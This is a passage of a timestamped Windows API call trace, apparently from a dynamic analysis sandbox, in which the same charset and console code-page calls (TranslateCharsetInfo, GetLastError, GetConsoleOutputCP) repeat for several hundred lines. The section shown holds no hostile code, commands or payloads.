	[0043.585] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.585] GetLastError () returned 0xcb
	[0043.585] GetConsoleOutputCP () returned 0x1b5
	[0043.585] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.585] GetLastError () returned 0xcb
	[0043.585] GetConsoleOutputCP () returned 0x1b5
	[0043.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.586] GetLastError () returned 0xcb
	[0043.586] GetConsoleOutputCP () returned 0x1b5
	[0043.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.586] GetLastError () returned 0xcb
	[0043.586] GetConsoleOutputCP () returned 0x1b5
	[0043.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.586] GetLastError () returned 0xcb
	[0043.586] GetConsoleOutputCP () returned 0x1b5
	[0043.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.586] GetLastError () returned 0xcb
	[0043.586] GetConsoleOutputCP () returned 0x1b5
	[0043.586] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.586] GetLastError () returned 0xcb
	[0043.586] GetConsoleOutputCP () returned 0x1b5
	[0043.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.587] GetLastError () returned 0xcb
	[0043.587] GetConsoleOutputCP () returned 0x1b5
	[0043.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.587] GetLastError () returned 0xcb
	[0043.587] GetConsoleOutputCP () returned 0x1b5
	[0043.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.587] GetLastError () returned 0xcb
	[0043.587] GetConsoleOutputCP () returned 0x1b5
	[0043.587] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.587] GetLastError () returned 0xcb
	[0043.588] GetConsoleOutputCP () returned 0x1b5
	[0043.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.588] GetLastError () returned 0xcb
	[0043.588] GetConsoleOutputCP () returned 0x1b5
	[0043.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.588] GetLastError () returned 0xcb
	[0043.588] GetConsoleOutputCP () returned 0x1b5
	[0043.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.588] GetLastError () returned 0xcb
	[0043.588] GetConsoleOutputCP () returned 0x1b5
	[0043.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.588] GetLastError () returned 0xcb
	[0043.588] GetConsoleOutputCP () returned 0x1b5
	[0043.588] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.588] GetLastError () returned 0xcb
	[0043.588] GetConsoleOutputCP () returned 0x1b5
	[0043.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.589] GetLastError () returned 0xcb
	[0043.589] GetConsoleOutputCP () returned 0x1b5
	[0043.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.589] GetLastError () returned 0xcb
	[0043.589] GetConsoleOutputCP () returned 0x1b5
	[0043.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.589] GetLastError () returned 0xcb
	[0043.589] GetConsoleOutputCP () returned 0x1b5
	[0043.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.589] GetLastError () returned 0xcb
	[0043.589] GetConsoleOutputCP () returned 0x1b5
	[0043.589] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.589] GetLastError () returned 0xcb
	[0043.589] GetConsoleOutputCP () returned 0x1b5
	[0043.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.590] GetLastError () returned 0xcb
	[0043.590] GetConsoleOutputCP () returned 0x1b5
	[0043.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.590] GetLastError () returned 0xcb
	[0043.590] GetConsoleOutputCP () returned 0x1b5
	[0043.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.590] GetLastError () returned 0xcb
	[0043.590] GetConsoleOutputCP () returned 0x1b5
	[0043.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.590] GetLastError () returned 0xcb
	[0043.590] GetConsoleOutputCP () returned 0x1b5
	[0043.590] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.590] GetLastError () returned 0xcb
	[0043.590] GetConsoleOutputCP () returned 0x1b5
	[0043.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.591] GetLastError () returned 0xcb
	[0043.591] GetConsoleOutputCP () returned 0x1b5
	[0043.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.591] GetLastError () returned 0xcb
	[0043.591] GetConsoleOutputCP () returned 0x1b5
	[0043.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.591] GetLastError () returned 0xcb
	[0043.591] GetConsoleOutputCP () returned 0x1b5
	[0043.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.591] GetLastError () returned 0xcb
	[0043.591] GetConsoleOutputCP () returned 0x1b5
	[0043.591] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.591] GetLastError () returned 0xcb
	[0043.591] GetConsoleOutputCP () returned 0x1b5
	[0043.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.592] GetLastError () returned 0xcb
	[0043.592] GetConsoleOutputCP () returned 0x1b5
	[0043.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.592] GetLastError () returned 0xcb
	[0043.592] GetConsoleOutputCP () returned 0x1b5
	[0043.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.592] GetLastError () returned 0xcb
	[0043.592] GetConsoleOutputCP () returned 0x1b5
	[0043.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.592] GetLastError () returned 0xcb
	[0043.592] GetConsoleOutputCP () returned 0x1b5
	[0043.592] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.592] GetLastError () returned 0xcb
	[0043.592] GetConsoleOutputCP () returned 0x1b5
	[0043.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.593] GetLastError () returned 0xcb
	[0043.593] GetConsoleOutputCP () returned 0x1b5
	[0043.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.593] GetLastError () returned 0xcb
	[0043.593] GetConsoleOutputCP () returned 0x1b5
	[0043.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.593] GetLastError () returned 0xcb
	[0043.593] GetConsoleOutputCP () returned 0x1b5
	[0043.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.593] GetLastError () returned 0xcb
	[0043.593] GetConsoleOutputCP () returned 0x1b5
	[0043.593] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.593] GetLastError () returned 0xcb
	[0043.593] GetConsoleOutputCP () returned 0x1b5
	[0043.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.594] GetLastError () returned 0xcb
	[0043.594] GetConsoleOutputCP () returned 0x1b5
	[0043.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.594] GetLastError () returned 0xcb
	[0043.594] GetConsoleOutputCP () returned 0x1b5
	[0043.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.594] GetLastError () returned 0xcb
	[0043.594] GetConsoleOutputCP () returned 0x1b5
	[0043.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.594] GetLastError () returned 0xcb
	[0043.594] GetConsoleOutputCP () returned 0x1b5
	[0043.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.594] GetLastError () returned 0xcb
	[0043.594] GetConsoleOutputCP () returned 0x1b5
	[0043.594] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.595] GetLastError () returned 0xcb
	[0043.595] GetConsoleOutputCP () returned 0x1b5
	[0043.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.595] GetLastError () returned 0xcb
	[0043.595] GetConsoleOutputCP () returned 0x1b5
	[0043.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.595] GetLastError () returned 0xcb
	[0043.595] GetConsoleOutputCP () returned 0x1b5
	[0043.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.595] GetLastError () returned 0xcb
	[0043.595] GetConsoleOutputCP () returned 0x1b5
	[0043.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.595] GetLastError () returned 0xcb
	[0043.595] GetConsoleOutputCP () returned 0x1b5
	[0043.595] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.595] GetLastError () returned 0xcb
	[0043.596] GetConsoleOutputCP () returned 0x1b5
	[0043.596] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.596] GetLastError () returned 0xcb
	[0043.596] GetConsoleOutputCP () returned 0x1b5
	[0043.596] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.596] GetLastError () returned 0xcb
	[0043.596] GetConsoleOutputCP () returned 0x1b5
	[0043.596] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.596] GetLastError () returned 0xcb
	[0043.596] GetConsoleOutputCP () returned 0x1b5
	[0043.596] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.596] GetLastError () returned 0xcb
	[0043.596] GetConsoleOutputCP () returned 0x1b5
	[0043.596] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.596] GetLastError () returned 0xcb
	[0043.596] GetConsoleOutputCP () returned 0x1b5
	[0043.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.597] GetLastError () returned 0xcb
	[0043.597] GetConsoleOutputCP () returned 0x1b5
	[0043.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.597] GetLastError () returned 0xcb
	[0043.597] GetConsoleOutputCP () returned 0x1b5
	[0043.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.597] GetLastError () returned 0xcb
	[0043.597] GetConsoleOutputCP () returned 0x1b5
	[0043.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.597] GetLastError () returned 0xcb
	[0043.597] GetConsoleOutputCP () returned 0x1b5
	[0043.597] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.597] GetLastError () returned 0xcb
	[0043.597] GetConsoleOutputCP () returned 0x1b5
	[0043.598] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.598] GetLastError () returned 0xcb
	[0043.598] GetConsoleOutputCP () returned 0x1b5
	[0043.598] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.598] GetLastError () returned 0xcb
	[0043.598] GetConsoleOutputCP () returned 0x1b5
	[0043.598] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.598] GetLastError () returned 0xcb
	[0043.598] GetConsoleOutputCP () returned 0x1b5
	[0043.598] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.598] GetLastError () returned 0xcb
	[0043.598] GetConsoleOutputCP () returned 0x1b5
	[0043.598] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.598] GetLastError () returned 0xcb
	[0043.598] GetConsoleOutputCP () returned 0x1b5
	[0043.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.599] GetLastError () returned 0xcb
	[0043.599] GetConsoleOutputCP () returned 0x1b5
	[0043.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.599] GetLastError () returned 0xcb
	[0043.599] GetConsoleOutputCP () returned 0x1b5
	[0043.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.599] GetLastError () returned 0xcb
	[0043.599] GetConsoleOutputCP () returned 0x1b5
	[0043.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.599] GetLastError () returned 0xcb
	[0043.599] GetConsoleOutputCP () returned 0x1b5
	[0043.599] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.599] GetLastError () returned 0xcb
	[0043.599] GetConsoleOutputCP () returned 0x1b5
	[0043.600] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.600] GetLastError () returned 0xcb
	[0043.600] GetConsoleOutputCP () returned 0x1b5
	[0043.600] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.600] GetLastError () returned 0xcb
	[0043.600] GetConsoleOutputCP () returned 0x1b5
	[0043.600] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.600] GetLastError () returned 0xcb
	[0043.600] GetConsoleOutputCP () returned 0x1b5
	[0043.600] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.600] GetLastError () returned 0xcb
	[0043.600] GetConsoleOutputCP () returned 0x1b5
	[0043.600] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.600] GetLastError () returned 0xcb
	[0043.600] GetConsoleOutputCP () returned 0x1b5
	[0043.601] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.601] GetLastError () returned 0xcb
	[0043.601] GetConsoleOutputCP () returned 0x1b5
	[0043.601] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.601] GetLastError () returned 0xcb
	[0043.601] GetConsoleOutputCP () returned 0x1b5
	[0043.601] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.601] GetLastError () returned 0xcb
	[0043.601] GetConsoleOutputCP () returned 0x1b5
	[0043.601] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.601] GetLastError () returned 0xcb
	[0043.601] GetConsoleOutputCP () returned 0x1b5
	[0043.601] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.601] GetLastError () returned 0xcb
	[0043.601] GetConsoleOutputCP () returned 0x1b5
	[0043.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.602] GetLastError () returned 0xcb
	[0043.602] GetConsoleOutputCP () returned 0x1b5
	[0043.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.602] GetLastError () returned 0xcb
	[0043.602] GetConsoleOutputCP () returned 0x1b5
	[0043.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.602] GetLastError () returned 0xcb
	[0043.602] GetConsoleOutputCP () returned 0x1b5
	[0043.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.602] GetLastError () returned 0xcb
	[0043.602] GetConsoleOutputCP () returned 0x1b5
	[0043.602] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef80, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef80) returned 0
	[0043.602] GetLastError () returned 0xcb
	[0043.602] GetConsoleOutputCP () returned 0x1b5
	[0043.603] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.603] GetLastError () returned 0xcb
	[0043.603] GetConsoleOutputCP () returned 0x1b5
	[0043.603] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.603] GetLastError () returned 0xcb
	[0043.603] GetConsoleOutputCP () returned 0x1b5
	[0043.603] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.603] GetLastError () returned 0xcb
	[0043.603] GetConsoleOutputCP () returned 0x1b5
	[0043.603] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.603] GetLastError () returned 0xcb
	[0043.603] GetConsoleOutputCP () returned 0x1b5
	[0043.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.604] GetLastError () returned 0xcb
	[0043.604] GetConsoleOutputCP () returned 0x1b5
	[0043.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.604] GetLastError () returned 0xcb
	[0043.604] GetConsoleOutputCP () returned 0x1b5
	[0043.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.604] GetLastError () returned 0xcb
	[0043.604] GetConsoleOutputCP () returned 0x1b5
	[0043.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.604] GetLastError () returned 0xcb
	[0043.604] GetConsoleOutputCP () returned 0x1b5
	[0043.604] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.604] GetLastError () returned 0xcb
	[0043.604] GetConsoleOutputCP () returned 0x1b5
	[0043.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.605] GetLastError () returned 0xcb
	[0043.605] GetConsoleOutputCP () returned 0x1b5
	[0043.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.605] GetLastError () returned 0xcb
	[0043.605] GetConsoleOutputCP () returned 0x1b5
	[0043.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.605] GetLastError () returned 0xcb
	[0043.605] GetConsoleOutputCP () returned 0x1b5
	[0043.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.605] GetLastError () returned 0xcb
	[0043.605] GetConsoleOutputCP () returned 0x1b5
	[0043.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.605] GetLastError () returned 0xcb
	[0043.605] GetConsoleOutputCP () returned 0x1b5
	[0043.605] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.606] GetLastError () returned 0xcb
	[0043.606] GetConsoleOutputCP () returned 0x1b5
	[0043.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.606] GetLastError () returned 0xcb
	[0043.606] GetConsoleOutputCP () returned 0x1b5
	[0043.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.606] GetLastError () returned 0xcb
	[0043.606] GetConsoleOutputCP () returned 0x1b5
	[0043.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.606] GetLastError () returned 0xcb
	[0043.606] GetConsoleOutputCP () returned 0x1b5
	[0043.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.606] GetLastError () returned 0xcb
	[0043.606] GetConsoleOutputCP () returned 0x1b5
	[0043.606] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.606] GetLastError () returned 0xcb
	[0043.607] GetConsoleOutputCP () returned 0x1b5
	[0043.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.607] GetLastError () returned 0xcb
	[0043.607] GetConsoleOutputCP () returned 0x1b5
	[0043.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.607] GetLastError () returned 0xcb
	[0043.607] GetConsoleOutputCP () returned 0x1b5
	[0043.607] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.607] GetLastError () returned 0xcb
	[0043.607] GetConsoleOutputCP () returned 0x1b5
